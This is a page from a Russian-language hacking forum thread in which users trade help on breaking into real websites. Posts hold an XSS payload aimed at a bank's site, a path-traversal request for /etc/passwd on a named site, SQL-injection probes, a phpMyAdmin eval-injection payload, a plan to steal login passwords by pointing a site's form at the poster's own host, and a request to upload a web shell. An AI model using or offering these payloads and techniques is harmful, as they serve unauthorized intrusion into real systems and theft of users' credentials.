HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #481  
Старый 17.08.2015, 10:44
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от ocheretko  
ocheretko said:

Может быть у кого-то получится обойти WAF
Код:
Code:
https://www.banki.ru/news/bankimail/subscribe/?a=0&email=" type=text autofocus onfocus=alert() id=">
ocheretko,Сервер банит IP. О таком надо предупреждать.
 
Ответить с цитированием

  #482  
Старый 18.08.2015, 15:50
smak
Guest
Сообщений: n/a
Провел на форуме:
8965

Репутация: 0
По умолчанию

можно вопрос нашел уязвимый сайт , там blind sql injection

он медленно подбирает таблицы видимо вслепую) поставил для перебора количество потоков равным 10

current user is dba :true (база оракле)

пытаюсь запустать скл шелл пишет operation system shell functionality not yet implemented for oracle)

чтото можно сделать?) ато там баз много и юзеров баз много до пенсии будет перебирать )
 
Ответить с цитированием

  #483  
Старый 18.08.2015, 17:11
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию

Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов?

Вот мой base.php

Код:
Code:

Вот сам submit

И так обращяюсь к submit.
document.getElementById('lsform').action="http://мойхост.ru/base.php?";
 
Ответить с цитированием

  #484  
Старый 18.08.2015, 20:10
zifus
Guest
Сообщений: n/a
Провел на форуме:
17650

Репутация: 0
По умолчанию

Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9

server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461 a58c9&cmd=phpinfo();

Сплоит не работает , ответ

SQL-запрос:

SELECT `information_schema`.`SCHEMATA` . *

FROM `information_schema`.`SCHEMATA`

GROUP BY BINARY `information_schema`.`SCHEMATA`.`SCHEMA_NAME`

ORDER BY BINARY `"]) OR eval($_REQUEST[cmd]); //` DESC

Ответ MySQL:

#1054 - Unknown column '"]) OR eval($_REQUEST[cmd]); //' in 'order clause'

как раскрутить помогите и сильно не ругайте я только начинаю.
 
Ответить с цитированием

  #485  
Старый 19.08.2015, 12:17
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от nik1201  
nik1201 said:

Нашел активную xss на сайте ,пытаюсь красть логи таким способом,но так не получается почему то,хотя когда копирую их сайт и заливаю на свой хостинг то все поллучается,есть ли другой способ красть пароли из POST запросов?
Вот мой base.php
Как выглядит XSS и где она?

Цитата:
Сообщение от zifus  
zifus said:

Здравствуйте!! Есть доступ к phpMyAdmin - 2.11.8.1deb5+lenny9
Сплоит не работает , ответ
Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.
 
Ответить с цитированием

  #486  
Старый 19.08.2015, 13:00
zifus
Guest
Сообщений: n/a
Провел на форуме:
17650

Репутация: 0
По умолчанию

Цитата:
Сообщение от XAMEHA  
XAMEHA said:

Как выглядит XSS и где она?
Какую CVE вы хотите проэксплуатировать? Также, вы можете выполнять стандартные SQL запросы, в том числе и LOAD DATA LOCAL INFILE.
Мне нужно залить шелл на сайт.. В PMA Нет привилегий..
 
Ответить с цитированием

  #487  
Старый 19.08.2015, 18:46
3nvY
Guest
Сообщений: n/a
Провел на форуме:
15245

Репутация: 11
По умолчанию

Код:
Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd
Подскажите как можно обойти.
 
Ответить с цитированием

  #488  
Старый 19.08.2015, 23:14
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от 3nvY  
3nvY said:

Код:
Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php?filesrc=../../../../etc/passwd
Подскажите как можно обойти.
Код:
Code:
http://directory.eyesonfreight.com/wp-content/themes/directoryengine/index.php
404 как бэ, да и плюс http://bit.ly/1J4XXyF уже сломали переломали
 
Ответить с цитированием

  #489  
Старый 20.08.2015, 01:58
Pro100Nyan
Guest
Сообщений: n/a
Провел на форуме:
1367

Репутация: 0
По умолчанию

Что то есть?

Код:
Code:
http://riot.mail.ru/info/news/index.php?show=dat&date=12082015'
 
Ответить с цитированием

  #490  
Старый 21.08.2015, 12:42
zifus
Guest
Сообщений: n/a
Провел на форуме:
17650

Репутация: 0
По умолчанию

Что можно с этого поиметь...
  • exception 'Exception' with message 'Disabled' in /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_theme.php:1019 Stack trace: #0 [internal function]: template_preprocess_theme_wallet_info(Array, 'theme_wallet_in...') #1 /var/www/vhosts//includes/theme.inc(710): call_user_func_array('template_prepro...', Array) #2 /tmp/tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u5 4jkaA.php(25): theme('theme_wallet_in...') #3 /var/www/vhosts//themes/engines/phptal/PHPTAL.php(675): tpl_53a1c255_apparat_select_tal__vkhVgeKtdH4x0t5u5 4jkaA(Object(PHPTAL), Object(PHPTAL_Context)) #4 /var/www/vhosts//themes/engines/phptal/phptal.engine(86): PHPTAL->execute() #5 /var/www/vhosts//includes/theme.inc(738): phptal_render_template('sites/all/modul...', Array) #6 /var/www/vhosts//sites/all/modules/custom/casino/controllers/ctrl_room.php(1273): theme('apparat_select') #7 /var/www/vhosts//sites/all/modules/custom/casino/casino.module(318): ctrl_room->http_apparat(Array) #8 [internal function]: casino_menu_callback('room', 'apparat') #9 /var/www/vhosts//includes/menu.inc(350): call_user_func_array('casino_menu_cal...', Array) #10 /var/www/vhosts//index.php(53): menu_execute_active_handler() #11 {main}
  • There is a problem with the phptal theme engine Please refer to the documentation on the PHPTAL project page.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ